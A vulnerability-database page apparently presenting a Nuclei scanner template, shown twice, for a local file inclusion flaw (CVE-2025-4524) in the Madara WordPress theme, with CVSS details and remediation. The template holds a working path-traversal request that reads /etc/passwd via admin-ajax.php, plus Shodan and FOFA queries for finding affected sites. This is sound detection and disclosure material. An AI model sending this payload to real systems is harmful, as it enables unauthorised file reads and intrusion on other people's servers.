WordPress Madara Theme < 2.2.2.1 - Local File Inclusion

CVE-2025-4524

Early Release

Description

Madara WordPress theme <= 2.2.2 contains a local file inclusion vulnerability caused by improper sanitization of the 'template' parameter, letting unauthenticated attackers execute arbitrary files on the server, exploit requires crafted request.

Severity

High

CVSS Score

9.1

Exploit Probability

Published Date

April 16, 2026

Template Author

0x_akoko

CVE-2025-4524.yaml

id: CVE-2025-4524

info:
  name: WordPress Madara Theme < 2.2.2.1 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
   Madara WordPress theme <= 2.2.2 contains a local file inclusion vulnerability caused by improper sanitization of the 'template' parameter, letting unauthenticated attackers execute arbitrary files on the server, exploit requires crafted request.
  impact: |
   Unauthenticated attackers can execute arbitrary PHP code, bypass access controls, and access sensitive data on the server.
  remediation: |
   Update to the latest version beyond 2.2.2.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/a3ee01da-218a-421d-8f9c-1dc6c056ef74
    - https://github.com/ptrstr/CVE-2025-4524
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4524
    - https://cxsecurity.com/issue/WLB-2026040012
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2025-4524
    cwe-id: CWE-22
    epss-score: 0.04234
    epss-percentile: 0.88791
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/themes/madara/"
    shodan-query: http.html:"/wp-content/themes/madara/"
  tags: cve,cve2025,wordpress,wp-theme,madara,lfi,unauth

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        action=madara_load_more&page=1&template=plugins/../../../../../../../etc/passwd&vars[orderby]=meta_value_num&vars[paged]=1&vars[posts_per_page]=16&vars[post_type]=wp-manga&vars[post_status]=publish

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ce04f97ca95e65bcf6abba885d3fc506156acf81f747ded9d7032dde6d0ef177022100f8a92a54d5c89f39b1a12c6e7a5bbb2f8ca63432f58a052ef8b6e7a06b627af5:922c64590222798bb761d5b6d8e72950

9.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2025-4524

CWE ID:

cwe-22

References

https://www.wordfence.com/threat-intel/vulnerabilities/id/a3ee01da-218a-421d-8f9c-1dc6c056ef74 https://github.com/ptrstr/CVE-2025-4524 https://nvd.nist.gov/vuln/detail/CVE-2025-4524 https://cxsecurity.com/issue/WLB-2026040012

Remediation Steps

Update to the latest version beyond 2.2.2.

id: CVE-2025-4524

info:
  name: WordPress Madara Theme < 2.2.2.1 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
   Madara WordPress theme <= 2.2.2 contains a local file inclusion vulnerability caused by improper sanitization of the 'template' parameter, letting unauthenticated attackers execute arbitrary files on the server, exploit requires crafted request.
  impact: |
   Unauthenticated attackers can execute arbitrary PHP code, bypass access controls, and access sensitive data on the server.
  remediation: |
   Update to the latest version beyond 2.2.2.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/a3ee01da-218a-421d-8f9c-1dc6c056ef74
    - https://github.com/ptrstr/CVE-2025-4524
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4524
    - https://cxsecurity.com/issue/WLB-2026040012
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2025-4524
    cwe-id: CWE-22
    epss-score: 0.04234
    epss-percentile: 0.88791
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/themes/madara/"
    shodan-query: http.html:"/wp-content/themes/madara/"
  tags: cve,cve2025,wordpress,wp-theme,madara,lfi,unauth

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        action=madara_load_more&page=1&template=plugins/../../../../../../../etc/passwd&vars[orderby]=meta_value_num&vars[paged]=1&vars[posts_per_page]=16&vars[post_type]=wp-manga&vars[post_status]=publish

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ce04f97ca95e65bcf6abba885d3fc506156acf81f747ded9d7032dde6d0ef177022100f8a92a54d5c89f39b1a12c6e7a5bbb2f8ca63432f58a052ef8b6e7a06b627af5:922c64590222798bb761d5b6d8e72950

WordPress Madara Theme < 2.2.2.1 - Local File Inclusion

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

WordPress Madara Theme < 2.2.2.1 - Local File Inclusion

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps